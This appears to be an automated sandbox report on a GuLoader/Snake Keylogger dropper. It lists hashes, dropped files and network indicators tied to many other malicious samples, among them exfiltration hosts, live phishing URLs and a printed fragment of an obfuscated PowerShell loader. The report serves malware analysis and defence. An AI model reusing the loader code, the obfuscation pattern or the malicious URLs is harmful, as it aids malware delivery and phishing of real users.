149.154.167.220	rRFQNO-N__MERODOPEDIDO106673.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	AL DALEEL ELECT SWITCH GEAR TR LLC. - PO.exe	Get hash	malicious	MassLogger RAT	Browse
	Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Pedido de Cota#U00e7#U00e3o-24100004_lista comercial.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	eFo07GvEf0.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Ziraat Bankasi Swift Mesaji,pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	AmountXpayable.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	FINAL SHIPPING DOCS.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	CLOSURE.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	REVISED INVOICE.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
213.165.67.102	Sprawl.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Snvlerier.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	r8x1WvSkbWSUjXh6.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	LisectAVT_2403002A_257.exe	Get hash	malicious	AgentTesla	Browse
	60yQVZ67vj.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	Nowe zam#U00f3wienie nr 201030019.exe	Get hash	malicious	AgentTesla	Browse
	Barotse.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse
	SecuriteInfo.com.W32.MSIL_Kryptik.DSR.gen.Eldorado.16905.957.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse
	Quotation-ZX6350ZA Drilling Cum Milling Machine.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse
	factra.exe	Get hash	malicious	AgentTesla	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	rRFQNO-N__MERODOPEDIDO106673.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	AL DALEEL ELECT SWITCH GEAR TR LLC. - PO.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Pedido de Cota#U00e7#U00e3o-24100004_lista comercial.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	rp8s2rxD5lpuQAG.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	InvoiceXCopy.xls	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	eFo07GvEf0.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Pedido urgente_pdf.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	Ziraat Bankasi Swift Mesaji,pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	AmountXpayable.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
smtp.ionos.es	Sprawl.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	213.165.67.102
	Rundholterne89.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	213.165.67.118
	Snvlerier.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	213.165.67.118
	Snvlerier.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	213.165.67.102
	Contrato de Cesin de Crditos Sin Recurso.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	213.165.67.118
	r8x1WvSkbWSUjXh6.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	213.165.67.102
	ZcH50SI4q45Dtpf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	213.165.67.118
	LisectAVT_2403002A_257.exe	Get hash	malicious	AgentTesla	Browse	213.165.67.102
	USyhqVZT33vX26Y.exe	Get hash	malicious	AgentTesla	Browse	213.165.67.118
	60yQVZ67vj.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	213.165.67.102
api.telegram.org	rRFQNO-N__MERODOPEDIDO106673.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	AL DALEEL ELECT SWITCH GEAR TR LLC. - PO.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Pedido de Cota#U00e7#U00e3o-24100004_lista comercial.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	eFo07GvEf0.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Ziraat Bankasi Swift Mesaji,pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	AmountXpayable.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	FINAL SHIPPING DOCS.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	CLOSURE.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	REVISED INVOICE.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
checkip.dyndns.com	rRFQNO-N__MERODOPEDIDO106673.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	AL DALEEL ELECT SWITCH GEAR TR LLC. - PO.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	Pedido de Cota#U00e7#U00e3o-24100004_lista comercial.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.130.0
	69-33-600 Kreiselkammer ER3.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	rp8s2rxD5lpuQAG.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	InvoiceXCopy.xls	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	eFo07GvEf0.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Pedido urgente_pdf.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	Ziraat Bankasi Swift Mesaji,pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	rRFQNO-N__MERODOPEDIDO106673.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	AL DALEEL ELECT SWITCH GEAR TR LLC. - PO.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Pedido de Cota#U00e7#U00e3o-24100004_lista comercial.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	eFo07GvEf0.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Ziraat Bankasi Swift Mesaji,pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	AmountXpayable.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	FINAL SHIPPING DOCS.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	CLOSURE.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	REVISED INVOICE.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
UTMEMUS	rRFQNO-N__MERODOPEDIDO106673.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	AL DALEEL ELECT SWITCH GEAR TR LLC. - PO.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	69-33-600 Kreiselkammer ER3.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	InvoiceXCopy.xls	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	eFo07GvEf0.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	FINAL SHIPPING DOCS.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	REVISED INVOICE.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	41570002689_20220814_05352297_HesapOzeti.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	PAYMENT ADVISE MT107647545.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	seethemagicalpersoninmylifewithherlifegoodforme.hta	Get hash	malicious	Cobalt Strike, Snake Keylogger	Browse	132.226.247.73
CLOUDFLARENETUS	https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123N	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	1.1.1.1
	https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123N	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	1.1.1.1
	la.bot.m68k.elf	Get hash	malicious	Unknown	Browse	108.162.209.105
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	104.21.53.8
	https://www.ccleaner.com/	Get hash	malicious	Unknown	Browse	172.66.0.227
	Douglas County Government.pdf	Get hash	malicious	Unknown	Browse	104.16.123.96
	Douglas County Government.pdf	Get hash	malicious	HtmlDropper	Browse	104.18.95.41
	https://download.ccleaner.com/portable/ccsetup629.zip	Get hash	malicious	Unknown	Browse	1.1.1.1
	http://360mozambique.com/	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://freshremovedigital.com/	Get hash	malicious	Unknown	Browse	188.114.96.3
ONEANDONE-ASBrauerstrasse48DE	https://talentrecruting.com/?Y3w2MDkxNzZ8d190cmF1MTEwRHx8fA0KfHxicnlhbi50LmJlYmJAc2FpYy5jb20=	Get hash	malicious	Unknown	Browse	74.208.140.2
	PO NAHK22012FA000000.docx	Get hash	malicious	Unknown	Browse	62.151.179.85
	LlbpXphTu9.exe	Get hash	malicious	Unknown	Browse	217.160.0.132
	derstand.doc	Get hash	malicious	Unknown	Browse	62.151.179.85
	feelnicewithgreatthingsgreatdayscomingforgreat.hta	Get hash	malicious	Cobalt Strike	Browse	62.151.179.85
	la.bot.mips.elf	Get hash	malicious	Unknown	Browse	212.227.7.107
	Sprawl.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	213.165.67.102
	Rundholterne89.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	213.165.67.118
	Invoice.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	217.160.0.158
	la.bot.powerpc.elf	Get hash	malicious	Mirai	Browse	212.227.7.42

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	rRFQNO-N__MERODOPEDIDO106673.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	AL DALEEL ELECT SWITCH GEAR TR LLC. - PO.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Pedido de Cota#U00e7#U00e3o-24100004_lista comercial.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	rp8s2rxD5lpuQAG.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	eFo07GvEf0.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Pedido urgente_pdf.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	Ziraat Bankasi Swift Mesaji,pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	AmountXpayable.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	FINAL SHIPPING DOCS.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
3b5074b1b5d032e5620f69f9f700ff0e	Douglas County Government.pdf	Get hash	malicious	HtmlDropper	Browse	149.154.167.220
	https://t.ly/2jKWO	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	149.154.167.220
	http://molatoriism.icu	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	Play_VM.Now.matt.sibilo_Audio.wav...v.html	Get hash	malicious	HtmlDropper	Browse	149.154.167.220
	https://dca13.z4.web.core.windows.net/werrx01USAHTML/?bcda=1-877-883-8072#	Get hash	malicious	TechSupportScam	Browse	149.154.167.220
	rRFQNO-N__MERODOPEDIDO106673.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	BOLUDA CORPORACI#U00d3N MAR#U00cdTIMA, S.L. PEDIDO 268e44.vbs	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://www.jasper.ai/	Get hash	malicious	Unknown	Browse	149.154.167.220
	AL DALEEL ELECT SWITCH GEAR TR LLC. - PO.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	ZW_PCCE-010023024001.bat	Get hash	malicious	Remcos, GuLoader	Browse	149.154.167.220
37f463bf4616ecd445d4a1937da06e19	FACTURA A-7507_H1758.exe	Get hash	malicious	GuLoader	Browse	142.250.185.78 142.250.186.161
	ZW_PCCE-010023024001.bat	Get hash	malicious	Remcos, GuLoader	Browse	142.250.185.78 142.250.186.161
	Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	142.250.185.78 142.250.186.161
	Pedido de Cota#U00e7#U00e3o-24100004_lista comercial.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	142.250.185.78 142.250.186.161
	69-33-600 Kreiselkammer ER3.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	142.250.185.78 142.250.186.161
	xxJfSec58P.exe	Get hash	malicious	Vidar	Browse	142.250.185.78 142.250.186.161
	UMrFwHyjUi.exe	Get hash	malicious	Vidar	Browse	142.250.185.78 142.250.186.161
	b157p9L0c1.exe	Get hash	malicious	Vidar	Browse	142.250.185.78 142.250.186.161
	PFlJLzFUqH.exe	Get hash	malicious	Vidar	Browse	142.250.185.78 142.250.186.161
	46QSz6qyKC.exe	Get hash	malicious	Vidar	Browse	142.250.185.78 142.250.186.161

Process:	C:\Users\user\Desktop\Adeleidae.exe
File Type:	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
Category:	dropped
Size (bytes):	775
Entropy (8bit):	3.0645506074266606
Encrypted:	false
SSDEEP:	12:8wl0dRi/kdT0Bnn1recmmbll1recmtRKQ1ooPiMolkKwDuuC:8p4Bnndno9WAl4k1DfC
MD5:	CEC45FE10AB60DE8D66A7054515FF010
SHA1:	730D1EFEB0E627959CDA1DB2196F6BBE4160CB02
SHA-256:	794EF1C881DE459FD461AC4DB34986B3D70E4619FB96C393EBA4A786039E24E6
SHA-512:	1E31A76071660268A07D8F545BA0A63D78BE381B0BE4917673A8C2FF35E7E5D6C16A7C21F0E359A8BDEE409715E1FA7459352F39B1E963765E825E964701C303
Malicious:	false
Reputation:	low
Preview:	L..................F.............................................................P.O. .:i.....+00.../C:\...................b.1...........ProgramData.H............................................P.r.o.g.r.a.m.D.a.t.a.....h.1...........Polyhistorisk.L............................................P.o.l.y.h.i.s.t.o.r.i.s.k.......2...........fagbladsjournalistens.ugi.d............................................f.a.g.b.l.a.d.s.j.o.u.r.n.a.l.i.s.t.e.n.s...u.g.i...(...H.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m.D.a.t.a.\.P.o.l.y.h.i.s.t.o.r.i.s.k.\.f.a.g.b.l.a.d.s.j.o.u.r.n.a.l.i.s.t.e.n.s...u.g.i.N.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.e.r.i.t.o.n.e.a.l.i.z.i.n.g.\.n.o.m.a.d.e.i.n.v.a.s.i.o.n.e.r.s.\.s.t.o.f.h.a.n.d.s.k.e.r.n.e.s.....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	14744
Entropy (8bit):	4.992175361088568
Encrypted:	false
SSDEEP:	384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
MD5:	A35685B2B980F4BD3C6FD278EA661412
SHA1:	59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
SHA-256:	3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
SHA-512:	70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0zborzuz.44l.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ehu4lz3.5go.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pgwboprl.ygv.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xi30enhu.mgu.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Adeleidae.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	931792
Entropy (8bit):	7.861129373263845
Encrypted:	false
SSDEEP:	24576:Zbu6fMeizDKw/NVGC11tD6lm7Pytae6/B1Go:tfBizmwl8Ojgm7OjGB1Go
MD5:	9F3C578444B7F35F3D25EADD5695C162
SHA1:	4E06953078FC5119A5D0A13B8B62DD58BF81EAC3
SHA-256:	D783F362C426661574A149A0BD801223273FE02C26B3D154DE21FDB9516CAF86
SHA-512:	FCC43ADF981F07472E2D122B275FD9D5232DE7879F8F08DE1C04F58D7D30966EC8C99FA3C1D3887E0796552F72DD31E23F083A97696E23ED18DFAF7B8E840444
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 13%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P.._...P...P..NP.._...P..s...P...V...P..Rich.P..........................PE..L......V.................d...........2............@................................. %....@.........................................................................................................................................................text...\|c.......d.................. ..`.rdata..\|............h..............@..@.data................~..............@....ndata.......P...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Adeleidae.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Foredes.Add

Download File

Process:	C:\Users\user\Desktop\Adeleidae.exe
File Type:	ASCII text, with very long lines (3263), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	55311
Entropy (8bit):	5.305868880233596
Encrypted:	false
SSDEEP:	1536:XRgSM0H1RWifwmUH2MPc0sRikiXJlNqg9n52A/:BgSMUcJHdPcpuBqy
MD5:	DACAF1AF574EF8118C591C15A0D51F65
SHA1:	F0FEE93EB44AD1173D6C6CAF2A48CB603B4161EF
SHA-256:	5376F943BCE3F5C64E62288FD91E27042C6C8A20B0F911B842F22F1A8200684E
SHA-512:	753497B31BC69C64D4C52E73E0ACE35F7C4479A7D63D557662D8D68F60241EF1D1DB2C2A41BC92BC420B19C600150D06E2E95740BABA23F05CDAC4CF72180B14
Malicious:	true
Preview:	$Gstebuddet=$Ostepind;..<#Resundsbaade Seksdoble Fossulate Fiskerbaadenes Topsail Nonefficiency #>..<#Octects Haandtere skrmbilledteksters Unmultiply Antihelte Emmit Tillgsbevillingernes #>..<#Abolitionized Patible Drfyldningers Wellnesses Disadventure Simplexes Telegraferingers #>..<#Spankingrummenes Naadige Pleochroous Analysatorens Subproblems Demobilisation Fuldbragt #>..<#Bootlicks Firmaernes Doigte Phosphatized Birches Vapsen Germlike #>..<#Aggregations Fondskodetyper boganmeldelses #>...$catouse = @'.kiloe. ha d$ RefuokransrCadavd.verp=Dibro$Nata SAntibePointj .oggrTelepsPolyniLudedkHeneqrMistre Jabo;Tjsno.Ki enf aramu ravenBen ocU evatEtn si Trico MadonInhau eg rdFUnderdFr,nte rgiavFderaaKonstn Rustd WondsUdellp .ppruUnintm MonopOxidieParfirN vean Beske rbejsHenfi Betje(Phasc$udstdUD,filnOverdhWashroParkimPrimiiUmenns posih Me.s,Cuba.$RolleUSagk nDekuph,ftgtoBestemOutpuiTownssStatshSbe rfMo.sks Tofak Indei Unrhboxyrrn Custi Pruin SpalgejendsBegrehS,eria owlevLngern tor3event2A

C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Fornuftens.Ano

Download File

Process:	C:\Users\user\Desktop\Adeleidae.exe
File Type:	data
Category:	dropped
Size (bytes):	328718
Entropy (8bit):	7.652184408995484
Encrypted:	false
SSDEEP:	6144:keD01P2iM78xMBclRRawAOAftPYv5F0wL1pu4CmOBMoDlW2C9Y+go0NUvXhgge:keD01P2iC8xMBcxaNjVPKvBpu45OMoxd
MD5:	2072BBBB9B5CCCEC9E8C79B1064BAE55
SHA1:	3E98FADE63CD0C8B11F6C70FD041615976A5185C
SHA-256:	64EF56E3D778AF9AE5479ADC2D94EF53F9EBF2C26DFF66ADE7190D74338CCCE7
SHA-512:	5696012E93C85D75235A7F6D400E426589E24F322A6AFF3B94AE61B97D374649168DB806F07D8E1F1BCC98E6D608925282BA7461EEDB23EBBEC585321BBB7532
Malicious:	false
Preview:	...........X.b.......ii......"..:...............I...///...44..1.h....11....T.....LL.....$.........~...................g......................;;........y....s...T.8...................%%. .............S..???.......2..Z.sss........eee.ddd.................JJJJJ.................................................FFF..g.[[[.............??......P..p......................3...........I.\|\|........k.7............111..m. ......................................~.............Y.....t...a..................................... ..........yyy.UUU.EE...........i.............y.........................................jj._.......................-......bb..............i......+..<<.....................1......,.......zzzzzzz..3.........qqq..............___.zzz................c........66........tt.............#..g.@.ggg.r.........FFF......s....""...[.......((.....................O........TTTT.R........hhh."................................\|.....!!......................AA..........................................

C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\bekrigelsers.tai

Download File

Process:	C:\Users\user\Desktop\Adeleidae.exe
File Type:	data
Category:	dropped
Size (bytes):	332313
Entropy (8bit):	1.2524630814549833
Encrypted:	false
SSDEEP:	1536:yaaIh+D2s7piRwb32b8giA7tquM42GdILYfRs/:ODj/VRDGyG
MD5:	9344CE0FFA5CDEE95A7D4ACB69316358
SHA1:	5F11CB1D4489ECE30229257AD648225BE9E27E1A
SHA-256:	F11224BF4988F3E5365402ADACDBEDC70D0732B35F7284E1D1C9076D09076D43
SHA-512:	943C8EE246D047AE8A0D3BA472FF991983502C678EF942269D87CEECBFFBE39011F0ADBAE209BB961D93B0C5A3254B2D2556B68FC794946E830AE66E867E598E
Malicious:	false
Preview:	............................SA1...............................".............................f............u.0..............................................C.......<..]...................................f..........................\|.........................................&.....i.......................3.......F....................................................................'...........O..............].............................P..........................................................................................................................................................................................u..........................s......................_...............#............n...$..............x..j......r...........\|...._...............................................V.f...._...................s..........................................R.................................................W...........................n....................................I....................

C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\campagnol.txt

Download File

Process:	C:\Users\user\Desktop\Adeleidae.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	353
Entropy (8bit):	4.211689964548391
Encrypted:	false
SSDEEP:	6:KhOMxEWb6aDKp8Wwoi/fAutuGIlKtXZsm1CLMQIbpW4mLWwPx2jJ:ADuakwDvEr2ZsQEnwwPx2jJ
MD5:	C1C6D8511B3FBE94F744DF9BA827D18D
SHA1:	B3EFA90BE122251E4267FDDB7BB6ADCCFDDDC958
